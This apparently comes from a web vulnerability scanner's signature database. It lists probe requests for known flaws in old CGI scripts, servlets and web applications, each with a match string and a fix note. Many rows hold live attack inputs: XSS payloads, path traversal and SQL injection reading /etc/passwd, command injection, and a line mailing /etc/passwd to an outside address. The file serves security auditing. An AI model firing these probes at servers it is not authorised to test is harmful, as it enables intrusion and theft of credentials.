c,generic,/search97cgi/,s97_cgi?action=FilterSearch&filter=<script>alert('Vulnerable');</script>;,"<script>alert('Vulnerable')</script>",GET,"SCO Unixware search script is vulnerable to XSS and command injection, BID-1717, CVE-2000-1014"
c,generic,/servlet/,"admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=","server.javawebserver.serviceAdmin",GET,"The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed."
c,generic,/servlet/,allaire.jrun.ssi.SSIFilter,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
c,generic,/servlet/,com.livesoftware.jrun.plugins.ssi.SSIFilter,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
c,generic,/servlet/,com.unify.servletexec.UploadServlet,200,GET,"This servlet allows attackers to upload files to the server."
c,generic,/servlet/,ContentServer?pagename=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Open Market Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02."
c,generic,/servlet/,Counter,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,DateServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,FingerServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,HelloWorldServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,IsItWorking,"Yes, It's working",GET,"Default Java (JServ) pages are present."
c,generic,/servlet/,SessionServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,SimpleServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,SnoopServlet,200,GET,"JRun default servlet found. All default code should be removed from servers."
c,generic,/servlet/,sunexamples.BBoardServlet,200,GET,"This default servlet lets attackers execute arbitrary commands." 
c,generic,/session/,admnlogin,200,GET,"SessionServlet Output, has session cookie info."
c,generic,/shop/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/shoponline/fpdb/,shop.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/shopping/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/shoppingdirectory/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server."
c,generic,/SilverStream/Meta/Tables/,?access-mode=text,"_DBProduct",GET,"The SilverStream database structure is available for remote viewing."
c,generic,/site/,"' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html","root:",GET,"Web DataBlade 4.12/Informix is vulnerable to SQL Injection."
c,generic,/site/,"' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username=USER --/.html","root:",GET,"IBM Informix Web DataBlade allows remote execute of SQL"
c,generic,/SiteScope/htdocs/,SiteScope.html,200,GET,"The SiteScope install may allow remote users to get sensitive information about the hosts being monitored."
c,generic,/sunshop.,index.php?action=storenew&username=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02."
c,generic,/support/,common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers to read files on the host."
c,generic,/supporter/,index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/supporter/,index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/supporter/,index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/us/cgi-bin/,sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini,"boot loader",GET,"Default scripts can allow arbitrary access to the host."
c,generic,/users/scripts/,submit.cgi,200,GET,"This might be interesting..."
c,generic,/WEB-INF./,web.xml,200,GET,"Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt fore more info."
c,generic,/webcart-lite/,orders/import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webcart-lite/config/,import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webcart/,carts/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web."
c,generic,/webcart/,config/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web."
c,generic,/webcart/,config/clients.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webcart/,orders/,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web."
c,generic,/webcart/,orders/import.txt,200,GET,"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web."
c,generic,/webMathematica/,MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif,"root:",GET,"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/"
c,generic,/webMathematica/,MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif,"boot loader",GET,"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/"
c,generic,/WebShop/logs/,cc.txt,200,GET,"This might be interesting..."
c,generic,/WebShop/templates/,cc.txt,200,GET,"This might be interesting..."
c,generic,/webtools/bonsai/,"ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsblame.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvslog.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/webtools/bonsai/,"showcheckins.cgi?person=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/Web_Store/,web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html,"root:",GET,"eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name."
c,generic,/wikihome/action/,conflict.php,200,GET,"Some versions of this script allow external source to be included/run by appending ?TemplateDir=http://my.host/ to requests."
c,generic,/wwwboard/,passwd.txt,200,GET,"The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version."
c,generic,/wwwboard/,wwwboard.cgi,200,GET,"This might be interesting..."
c,generic,/wwwboard/,wwwboard.pl,200,GET,"This might be interesting..."
c,generic,/wwwthreads/,3tvars.pm,200,GET,"This might be interesting..."
c,generic,/wwwthreads/,w3tvars.pm,200,GET,"This might be interesting..."
c,generic,/xdk,/,"Oracle XML Development",GET,"Default Oracle documentation found."
c,generic,/xsql/demo/adhocsql/,query.xsql?sql=select%20username%20from%20ALL_USERS,"USERNAME",GET,"This allows attackers to perform queries to the Oracle database. This sample app should be removed."
c,generic,/xsql/demo/airport/,airport.xsql?xml-stylesheet=none,"cvsroot",GET,"This is a sample file which should be removed. Oracle XSQL allows arbitrary code to be execute."
c,generic,/~/,<script>alert('Vulnerable')</script>.asp,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02"
c,generic,/~/,<script>alert('Vulnerable')</script>.aspx,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02"
c,generic,/~/,<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null,"<script>alert('Vulnerable')</script>",GET,"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02"
c,generic,@CGIDIRS,"alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,"boot.ini",GET,"This CGI allows attackers to execute arbitrary commands on the server."
c,generic,@CGIDIRS,"ccvsblame.cgi?file=/index.html&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","resolv.conf",GET,"Allows attacker to execute commands as http daemon. Upgrade or remove."
c,generic,@CGIDIRS,"cvsblame.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvslog.cgi?file=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"excite;IFS=\"$\";/bin/cat /etc/passwd|mail test@test.com",200,GET,"Excite software is vulnerable to password file theft remotely."
c,generic,@CGIDIRS,"FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com","root:",GET,"This CGI allows attackers to read files and execute commands remotely."
c,generic,@CGIDIRS,"info2www '(../../../../../../../bin/mail root </etc/passwd>","root:",GET,"This CGI allows attackers to execute commands. passwd file may have been mailed to root."
c,generic,@CGIDIRS,"login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;","<script>alert('Vulnerable')</script>",GET,"BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1","root:",GET,"Remote file retrieval."
c,generic,@CGIDIRS,"sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3","Unknown configuration",GET,"The Sawmill CGI allows attackers to read the Sawmill password."
c,generic,@CGIDIRS,"shop.pl/page=;cat%20shop.pl|","\/perl",GET,"Shopping Cart (Hassan) allows execution of remote commands. CAN-2001-0985."
c,generic,@CGIDIRS,"showcheckins.cgi?person=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","<script>alert('Vulnerable')</script>",GET,"urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,"viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02."
c,generic,@CGIDIRS,"viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>",GET,"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02."
c,generic,@CGIDIRS,%2e%2e/abyss.conf,200,GET,"The Abyss configuration file was successfully retrievd. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/"
c,generic,@CGIDIRS,,"Index of ",GET,"Directory indexing of CGI directory should be disabled."
c,generic,@CGIDIRS,.access,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,.cobalt,200,GET,"May allow remote admin of CGI scripts."
c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02"
c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>,"alert('Vulnerable')",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,.fhp,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,.htaccess,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,.htaccess.old,200,GET,"Backup/Old copy of .htaccess - Contains authorization information"
c,generic,@CGIDIRS,.htaccess.save,200,GET,"Backup/Old copy of .htaccess - Contains authorization information"
c,generic,@CGIDIRS,.htaccess~,200,GET,"Backup/Old copy of .htaccess - Contains authorization information"
c,generic,@CGIDIRS,.htpasswd,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,.namazu.cgi,200,GET,"Namazu search engine found. Vulnerable to CSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02."
c,generic,@CGIDIRS,.passwd,200,GET,"Contains authorization information"
c,generic,@CGIDIRS,/,stat.pl,200,GET,"Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER. 
c,generic,@CGIDIRS,/ans/ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely."
c,generic,@CGIDIRS,/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/,"http://xxxxxxxxxx/atk/",GET,"Achievo can be made to include php files from another domain. Upgrade to a new version."
c,generic,@CGIDIRS,/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/,"http://xxxxxxxx/errors/configure_instructions",GET,"Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version."
c,generic,@CGIDIRS,/GW5/GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system."
c,generic,@CGIDIRS,/GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system."
c,generic,@CGIDIRS,/rightfax/fuwww.dll/?,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,/scripts/*%0a.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,14all-1.1.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,14all.cgi?cfg=../../../../../../../../etc/passwd,"root:",GET,"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
c,generic,@CGIDIRS,a1disp3.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"This CGI allows attackers read arbitrary files on the host."
c,generic,@CGIDIRS,a1stats/a1disp3.cgi?../../../../../../../etc/passwd,"root:",GET,"Remote file retrieval."
c,generic,@CGIDIRS,a1stats/a1disp4.cgi?../../../../../../../etc/passwd,"root:",GET,"Remote file retrieval."
c,generic,@CGIDIRS,addbanner.cgi,200,GET,"This CGI may allow attackers to read any file on the system."
c,generic,@CGIDIRS,adduser.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,add_ftp.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.cgi?list=../../../../../../../../../../etc/passwd,"root:",GET,"Add2it Mailman Free V1.73 allows arbitrary files to be retrieved."
c,generic,@CGIDIRS,admin.php,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.php3,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,admin.pl,200,GET,"Might be interesting"
c,generic,@CGIDIRS,adminhot.cgi,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner."
c,generic,@CGIDIRS,adminwww.cgi,200,GET,"This might be interesting... has been seen in web logs from another CGI scanner."
c,generic,@CGIDIRS,af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd,"root:",GET,"AlienForm2 revision 1.5 allows any file to be read from the remote system."
c,generic,@CGIDIRS,aglimpse,200,GET,"This CGI may allow attackers to execute remote commands."
c,generic,@CGIDIRS,aglimpse.cgi,200,GET,"This CGI may allow attackers to execute remote commands."
c,generic,@CGIDIRS,Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0,"resolv.conf",GET,"This CGI allows attackers to view arbitrary files on the host."
c,generic,@CGIDIRS,alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd,"root:",GET,"AlienForm2 revision 1.5 allows any file to be read from the remote system."
c,generic,@CGIDIRS,amadmin.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,anacondaclip.pl?template=../../../../../../../../../../etc/passwd,"root:",GET,"This allows attackers to read arbitrary files from the server."
c,generic,@CGIDIRS,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely."
c,generic,@CGIDIRS,AnyBoard.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,AnyForm,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,AnyForm2,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/,"root:",GET,"This allows attackers to read arbitrary files from the server."
c,generic,@CGIDIRS,architext_query.cgi,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands."
c,generic,@CGIDIRS,architext_query.pl,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands."
c,generic,@CGIDIRS,ash,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,AT-admin.cgi,200,GET,"Admin interface...no known holes"
c,generic,@CGIDIRS,AT-generate.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=,"<script>alert('Vulnerable')</script>",GET,"Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,auktion.cgi?menue=../../../../../../../../../../etc/passwd,"root:",GET,"The CGI allows attackers to read arbitrary files remotely."
c,generic,@CGIDIRS,auth_data/auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,@CGIDIRS,awl/auctionweaver.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,awstats.pl,"Traffic",GET,"Free realtime logfile analyzer for advanced web statistics. Should be protected."
c,generic,@CGIDIRS,ax-admin.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,ax.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,axs.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,badmin.cgi,200,GET,"BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgrade."
c,generic,@CGIDIRS,banner.cgi,200,GET,"This CGI may allow attackers to read any file on the system."
c,generic,@CGIDIRS,bannereditor.cgi,200,GET,"This CGI may allow attackers to read any file on the system."
c,generic,@CGIDIRS,bash,200,GET,"Shell found in CGI dir!"
c,generic,@CGIDIRS,bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files."
c,generic,@CGIDIRS,bb-hist?HISTFILE=../../../../../../../../../../etc/passwd,"root:",GET,"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files."
c,generic,@CGIDIRS,bb-histlog.sh,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd,"root:",GET,"Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system."
c,generic,@CGIDIRS,bbs_forum.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
c,generic,@CGIDIRS,betsie/parserl.pl/<script>alert('Vulnerable')</script>;,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,bizdb1-search.cgi,200,GET,"This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm"
c,generic,@CGIDIRS,bnbform,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,bnbform.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,boozt/admin/index.cgi?section=5&input=1,200,GET,"Boozt CGI may have a buffer overflow. Upgrade to a version new than 0.9.8alpha."
c,generic,@CGIDIRS,bsguest.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bslist.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,bulk/bulk.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,c32web.exe/ChangeAdminPassword,200,GET,"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password."
c,generic,@CGIDIRS,cached_feed.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cachemgr.cgi,200,GET,"Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans."
c,generic,@CGIDIRS,calendar/calendar_admin.pl?config=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,calendar/index.cgi,200,GET,"Mike's Calendar CGI contained a bug which allowed arbitrary command exectution (version 1.4), see http://freshmeat.net/projects/mycalendar/"
c,generic,@CGIDIRS,calendar_admin.pl?config=|cat%20/etc/passwd|,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,calender_admin.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cal_make.pl?p0=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the host."
c,generic,@CGIDIRS,campas?%0acat%0a/etc/passwd%0a,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,cart.pl,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,cart32.exe,200,GET,"request cart32.exe/cart32clientlist"
c,generic,@CGIDIRS,cartmanager.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cbmc/forums.cgi,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,cgi-lib.pl,200,GET,"CGI Library. If retrieved check to see if it is outdated, it may  have vuls"
c,generic,@CGIDIRS,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,@CGIDIRS,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,@CGIDIRS,cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows attackers to read arbitrary files on the server."
c,generic,@CGIDIRS,cgimail.exe,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,cgiwrap,200,GET,"Some versions of cgiwrap allow anyone to execute commands remotely." 
c,generic,@CGIDIRS,change-your-password.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,class/mysql.class,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,@CGIDIRS,classified.cgi,200,GET,"Check Phrack 55 for info by RFP"
c,generic,@CGIDIRS,classifieds,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,classifieds.cgi,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,classifieds/classifieds.cgi,200,GET,"Mike's Classifieds CGI contained a bug which allowed arbitrary command exectution (version 1.2), see http://freshmeat.net/projects/myclassifieds/"
c,generic,@CGIDIRS,clickcount.pl?view=test,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,clickresponder.pl,200,GET,"This might be interesting... has been seen in web logs from a scanner."
c,generic,@CGIDIRS,code.php,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,code.php3,200,GET,"This might be interesting..."
c,generic,@CGIDIRS,commandit.cgi,